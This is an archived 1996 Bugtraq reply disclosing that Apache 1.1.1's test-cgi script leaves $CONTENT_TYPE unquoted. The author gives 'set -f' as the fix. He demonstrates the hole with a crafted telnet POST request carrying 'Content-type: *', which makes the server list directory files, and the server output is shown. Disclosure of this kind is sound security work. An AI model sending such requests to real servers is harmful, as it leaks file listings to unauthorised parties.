Bugtraq mailing list archives
Re: Vulnerability in test-cgi
From: im14u2c () cegt201 bradley edu (Joe Zbiciak)
Date: Tue, 3 Dec 1996 22:17:18 -0600
And then Ed Arnold went and said something like this: | |Another data point for anyone out there running Apache ... test-cgi |in the apache-1.1.1 distribution already has the required | |echo QUERY_STRING = "$QUERY_STRING" | However, it does not have the necessary quotes around the "$CONTENT_TYPE" string. Therefore it's still vulnerable in it's default configuration. Adding "set -f" as the second line of the script closes the hole completely. (www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo; sleep 5) | telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. HTTP/1.0 200 OK Date: Wed, 04 Dec 1996 04:11:15 GMT Server: Apache/1.1.1 Content-type: text/plain CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = Apache/1.1.1 SERVER_NAME = frankenstein.asylum.net GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = POST HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/test-cgi QUERY_STRING = REMOTE_HOST = localhost REMOTE_ADDR = 127.0.0.1 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = (bunch of files listed here, whose names I don't care to share) CONTENT_LENGTH = 0 Connection closed by foreign host. (www) frankenstein:~$ -- :======= Joe Zbiciak =======: Bonehead Quotes of 1992 (5 of 14) :- - im14u2c () bradley edu - -:"Until recently the word facist was considered : - - - - - http: - - - - - : shameful. Fortunately that time has passed. ://ee1.bradley.edu/~im14u2c/: In fact, there is now a reassessment of how :======= DISCLAIMER: =======: much Grandpa Benito did for Italy." : It's all right... - - -- -- Alessandra Mussolini, announcing her plan -- - - I didn't do it! : to run for parliament as a neofascist (462:834 11:15)
Current thread:
- Re: Vulnerability in test-cgi Ed Arnold (Dec 03)
- Re: Vulnerability in test-cgi Joe Zbiciak (Dec 03)
- Re: Vulnerability in test-cgi Evgene Ilyine (Dec 17)
- vixie cron intel BSD exploit code Evgene Ilyine (Dec 17)
- sunos rlogin Roger Espel Llima (Dec 04)
- Re: Vulnerability in test-cgi Joe Zbiciak (Dec 03)